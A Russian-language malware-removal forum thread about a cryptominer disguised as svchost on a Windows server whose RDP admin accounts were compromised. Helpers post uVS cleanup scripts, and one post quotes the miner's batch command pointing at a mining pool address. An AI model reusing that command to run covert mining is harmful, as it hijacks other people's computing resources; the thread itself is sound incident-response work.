Показано с 1 по 17 из 17.

нечто маскируется под svchost (заявка № 183458)

  1. #1
    Junior Member Репутация
    Регистрация
    11.05.2015
    Сообщений
    9
    Вес репутации
    33

    нечто маскируется под svchost

    Ребята, имеется server2008, в котором регулярно появляется процесс svchost. ProcessExplorer ничего о нем сказать не смог, кроме того, куда он стучится (93.171.246.8:8882). Увы, антивирусное ПО ничего не находит.
    Уже опытным путем установил, что если зарезать исходящий порт - эта зараза перебирает следующие 100 и снова начинает грузить систему на 100%. Пока пишу это сообщение - процесс сам по себе исчез. Руками убивать смысла нет - поднимается сам когда захочет.
    Во вложении логи.
    Есть у кого какие мысли?

    - - - - -Добавлено - - - - -

    отдельным постом прикрепляю скриншот
    Изображения Изображения
    • Тип файла: jpg 123562.jpg (117.4 Кб, 12 просмотров)
    Вложения Вложения

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,287
    Вес репутации
    378
    Уважаемый(ая) drone, спасибо за обращение на наш форум!

    Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в правилах оформления запроса о помощи.

    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Junior Member Репутация
    Регистрация
    11.05.2015
    Сообщений
    9
    Вес репутации
    33
    отвечаю сам себе - это майнинг криптовалюты
    запускается по цепочке taskmgr.exe-cmd.exe-svchost.exe одним из пользователей rdp
    найти, что же запускается, пока не смог

  5. #4
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для mike 1
    Регистрация
    05.11.2011
    Адрес
    Москва
    Сообщений
    42,908
    Вес репутации
    1060
    1. Скачайте Universal Virus Sniffer (uVS)
    2. Извлеките uVS из архива или из zip-папки. Откройте папку с UVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
    3. Выберите меню "Файл" => "Сохранить полный образ автозапуска". Программа предложит вам указать место сохранения лога в формате "имя_компьютера_дата_сканирования". Лог необходимо сохранить на рабочем столе.
      !!!Внимание. Если у вас установлены архиваторы WinRAR или 7-Zip, то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную.
    4. Дождитесь окончания работы программы и прикрепите лог к посту в теме.
      !!! Обратите внимание, что утилиты необходимо запускать от имени Администратора. По умолчанию в Windows XP так и есть. В Windows Vista и Windows 7 администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать Запуск от имени Администратора, при необходимости укажите пароль администратора и нажмите "Да".
    Инструкции выполняются в том порядке, в котором они вам даны.
    А вы совершаете эти 4 ошибки на форумах? Оставить отзыв Обучение на VirusInfo
    Защита от неизвестных троянцев-шифровальщиков => FixSecurity, Kaspersky Anti-Ransomware Tool
    Интересный блог Андрея Иванова по шифровальщикам
    Антивирус на 30 дней => https://clck.ru/FKsBt

  6. #5
    Junior Member Репутация
    Регистрация
    11.05.2015
    Сообщений
    9
    Вес репутации
    33
    сделал
    Вложения Вложения

  7. #6
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для mike 1
    Регистрация
    05.11.2011
    Адрес
    Москва
    Сообщений
    42,908
    Вес репутации
    1060
    Пароли от учетных записей Guest и Manager поменяйте.

    1. Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
    2. Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
    3. Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:
      Код:
      ;uVS v3.85.6 [http://dsrt.dyndns.org]
      ;Target OS: NTv6.1
      v385c
      breg
      
      zoo %SystemDrive%\USERS\GUEST\DESKTOP\JHPROTOMINER.EXE
      delall %SystemDrive%\USERS\GUEST\DESKTOP\JHPROTOMINER.EXE
      delall %SystemDrive%\USERS\MANAGER\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XVVNUJIYUYTRGFHG4564T4TRFFDCBVNGHFGBVNFGHFHGJGHTYUDFGFHGJUFRTGRTEFDG - ЯРЛЫК.LNK
      delall %SystemDrive%\USERS\MANAGER\DESKTOP\XVVNUJIYUYTRGFHG4564T4TRFFDCBVNGHFGBVNFGHFHGJGHTYUDFGFHGJUFRTGRTEFDG.EXE
      zoo %SystemRoot%\CONF.EXE
      czoo
    4. В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
    5. Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы.
    6. После выполнения скрипта в папке с uVS появится архив ZIP с именем, начинающимся с ZOO_ и далее из даты и времени, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.


    Сделайте новый лог uVS.
    Инструкции выполняются в том порядке, в котором они вам даны.
    А вы совершаете эти 4 ошибки на форумах? Оставить отзыв Обучение на VirusInfo
    Защита от неизвестных троянцев-шифровальщиков => FixSecurity, Kaspersky Anti-Ransomware Tool
    Интересный блог Андрея Иванова по шифровальщикам
    Антивирус на 30 дней => https://clck.ru/FKsBt

  8. #7
    Junior Member Репутация
    Регистрация
    11.05.2015
    Сообщений
    9
    Вес репутации
    33
    спасибо, все сделал
    новые логи:

    http://rghost.ru/6nLpXLMFd

    PS выложил на сторонний ресурс, здесь почему-то уперся в общий лимит в 976 КБ и удалить старые файлы не смог.

  9. #8
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для mike 1
    Регистрация
    05.11.2011
    Адрес
    Москва
    Сообщений
    42,908
    Вес репутации
    1060
    Что с проблемой?
    Инструкции выполняются в том порядке, в котором они вам даны.
    А вы совершаете эти 4 ошибки на форумах? Оставить отзыв Обучение на VirusInfo
    Защита от неизвестных троянцев-шифровальщиков => FixSecurity, Kaspersky Anti-Ransomware Tool
    Интересный блог Андрея Иванова по шифровальщикам
    Антивирус на 30 дней => https://clck.ru/FKsBt

  10. Это понравилось:


  11. #9
    Junior Member Репутация
    Регистрация
    11.05.2015
    Сообщений
    9
    Вес репутации
    33
    Цитата Сообщение от mike 1 Посмотреть сообщение
    Что с проблемой?
    проблема осталась. прикладываю свежие логи с запущенной заразой.
    руками уже истребил содержимое папки windows\api (поиск файл не находил. чтобы зайти в папку, мне понадобилось сделать себя ее владельцем)
    в ней лежал bat с содержанием:

    svchost -a scrypt-jane -o 93.171.246.8:8882 -u admin -p 123456
    pause

    и сам svchost.exe

    истребил руками, могу поделиться образцом.
    узнать бы еще, как он запускался...

    логи на любой вкус:

    http://rghost.ru/6HlRlfqK7

    остальные во вложениях
    Вложения Вложения

  12. #10
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для mike 1
    Регистрация
    05.11.2011
    Адрес
    Москва
    Сообщений
    42,908
    Вес репутации
    1060
    1. Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
    2. Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
    3. Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:
      Код:
      ;uVS v3.85.6 [http://dsrt.dyndns.org]
      ;Target OS: NTv6.1
      v385c
      breg
      
      addsgn BA6F9BB2926F0E220DD4AEB164C8FA281F8FFC1E0106E08715538D3F94FEB2DC705F40BB1ED054C0E0F4AC60535138FC7D9E505855DAB0962C77A42F8B8B6A13 8 Trojan.Coinbit.28 [DrWeb]
      
      zoo %SystemRoot%\API\SVCHOST.EXE
      bl 05D2C79636D23C869BE10C47B64EDBCA 418304
      delall %SystemRoot%\API\SVCHOST.EXE
      zoo %SystemRoot%\CONF.EXE
      chklst
      delvir
      
      czoo
    4. В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
    5. Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Прошу учесть, что компьютер может быть перезагружен.
    6. После выполнения скрипта в папке с uVS появится архив ZIP с именем, начинающимся с ZOO_ и далее из даты и времени, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.


    Сделайте новый лог uVS.
    Инструкции выполняются в том порядке, в котором они вам даны.
    А вы совершаете эти 4 ошибки на форумах? Оставить отзыв Обучение на VirusInfo
    Защита от неизвестных троянцев-шифровальщиков => FixSecurity, Kaspersky Anti-Ransomware Tool
    Интересный блог Андрея Иванова по шифровальщикам
    Антивирус на 30 дней => https://clck.ru/FKsBt

  13. #11
    Junior Member Репутация
    Регистрация
    11.05.2015
    Сообщений
    9
    Вес репутации
    33
    содержимое папки api вычистил еще вчера, но для дела закинул назад svchost.exe и отправил образец после выполнения скрипта

    теперь самое интересное:
    ночью некто зашел под учеткой с правами админа (пароль сложный, порядка 15 символов), создал левого пользователя с правами user и сделал log off. перед этим запустил заразу на сервере с рабочего стола. это единственный пользователь с правами админа, у которого я еще не менял пароль.

    утром увидел запущенный процесс svchost. процесс ссылался на рабочий стол, но исходника на раб столе уже не было. прибил процесс, папку с профилем, сам профиль, удалил подозрительные драйвера касперского (он не устанавливался, максимум запускался бесплатный сканер)

    логи после скрипта с svchost.exe (все еще продолжает запускаться из несуществующих мест) :

    http://rghost.ru/8zqn2x2zX
    Последний раз редактировалось drone; 14.05.2015 в 02:01.

  14. #12
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для mike 1
    Регистрация
    05.11.2011
    Адрес
    Москва
    Сообщений
    42,908
    Вес репутации
    1060
    Вы еще легко отделались. Могли и базы 1С зашифровать на сервере. Пароль от учетной записи Администратора тупо сбрутили. Меняйте все пароли.

    1. Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
    2. Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
    3. Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:
      Код:
      ;uVS v3.85.6 [http://dsrt.dyndns.org]
      ;Target OS: NTv6.1
      v385c
      breg
      
      zoo %Sys32%\ETC\SVCHOST.EXE
      delall %Sys32%\ETC\SVCHOST.EXE
      czoo
    4. В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
    5. Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Прошу учесть, что компьютер может быть перезагружен.
    6. После выполнения скрипта в папке с uVS появится архив ZIP с именем, начинающимся с ZOO_ и далее из даты и времени, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.


    Сделайте новый лог uVS.
    Инструкции выполняются в том порядке, в котором они вам даны.
    А вы совершаете эти 4 ошибки на форумах? Оставить отзыв Обучение на VirusInfo
    Защита от неизвестных троянцев-шифровальщиков => FixSecurity, Kaspersky Anti-Ransomware Tool
    Интересный блог Андрея Иванова по шифровальщикам
    Антивирус на 30 дней => https://clck.ru/FKsBt

  15. #13
    Junior Member Репутация
    Регистрация
    11.05.2015
    Сообщений
    9
    Вес репутации
    33
    Код:
    Копирование файла в Zoo: \\?\C:\WINDOWS\SYSTEM32\ETC\SVCHOST.EXE
    Нет доступа к файлу, возможно файл защищен [ C:\WINDOWS\SYSTEM32\ETC\SVCHOST.EXE ]
    (!) Не удалось получить доступ к C:\WINDOWS\SYSTEM32\ETC\SVCHOST.EXE
    Нет доступа к файлу, возможно файл защищен [ C:\WINDOWS\SYSTEM32\ETC\SVCHOST.EXE ]
    (!) Не удалось получить доступ к C:\WINDOWS\SYSTEM32\ETC\SVCHOST.EXE
    \\?\C:\USERS\MATV\DOWNLOADS\UVS\UVS\ZOO\SVCHOST.EXE.---
    Не удалось скопировать файл [Отказано в доступе. ]
    как и писал выше - пусто там, такое ощущение, что каждый раз подчищаются следы.

    по поводу паролей - все оказалось гораздо хуже. не знаю как, но у третьих лиц оказались пароли от всех администраторских учеток. по логам посмотрел - после смены паролей, была ровно одна попытка входа на каждую из учеток с левого ip.

    последний раз svchost.exe стартовал в четверг (parent = cmd.exe). на всякий случай восстановил и cmd.exe, хотя текущий размер совпадал с оригинальным. после этого проблема больше не беспокоит.
    буду надеяться, что больше не повторится подобное.

  16. #14
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для mike 1
    Регистрация
    05.11.2011
    Адрес
    Москва
    Сообщений
    42,908
    Вес репутации
    1060
    Новый лог uVS сделайте.
    Инструкции выполняются в том порядке, в котором они вам даны.
    А вы совершаете эти 4 ошибки на форумах? Оставить отзыв Обучение на VirusInfo
    Защита от неизвестных троянцев-шифровальщиков => FixSecurity, Kaspersky Anti-Ransomware Tool
    Интересный блог Андрея Иванова по шифровальщикам
    Антивирус на 30 дней => https://clck.ru/FKsBt

  17. #15
    Junior Member Репутация
    Регистрация
    11.05.2015
    Сообщений
    9
    Вес репутации
    33
    Цитата Сообщение от mike 1 Посмотреть сообщение
    Новый лог uVS сделайте.
    http://rghost.ru/72dxhkDfx

    сделал.

  18. #16
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для mike 1
    Регистрация
    05.11.2011
    Адрес
    Москва
    Сообщений
    42,908
    Вес репутации
    1060
    Лог в порядке. Ставьте обновления на сервер через центр обновлений Windows.
    Инструкции выполняются в том порядке, в котором они вам даны.
    А вы совершаете эти 4 ошибки на форумах? Оставить отзыв Обучение на VirusInfo
    Защита от неизвестных троянцев-шифровальщиков => FixSecurity, Kaspersky Anti-Ransomware Tool
    Интересный блог Андрея Иванова по шифровальщикам
    Антивирус на 30 дней => https://clck.ru/FKsBt

  19. #17
    Cybernetic Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    29.12.2008
    Сообщений
    48,233
    Вес репутации
    977

    Итог лечения

    Статистика проведенного лечения:
    • Получено карантинов: 2
    • Обработано файлов: 3
    • В ходе лечения вредоносные программы в карантинах не обнаружены


  • Уважаемый(ая) drone, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Похожие темы

    1. Вирус маскируется под svchost
      От Tpycuxa в разделе Помогите!
      Ответов: 23
      Последнее сообщение: 02.02.2013, 23:54
    2. вирус маскируется под svchost (заявка №112102)
      От CyberHelper в разделе Отчеты сервиса лечения VirusInfo
      Ответов: 2
      Последнее сообщение: 30.09.2011, 03:00
    3. вирус маскируется под svchost (заявка №112102)
      От CyberHelper в разделе Отчеты сервиса лечения VirusInfo
      Ответов: 0
      Последнее сообщение: 30.09.2011, 00:00
    4. parport.sys маскируется
      От Karlson в разделе Помогите!
      Ответов: 18
      Последнее сообщение: 02.02.2008, 03:22
    5. Маскируется IEXPLORE.EXE, ругается svchost.exe
      От Andrey Golubev в разделе Помогите!
      Ответов: 19
      Последнее сообщение: 11.01.2008, 14:36

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.00552 seconds with 20 queries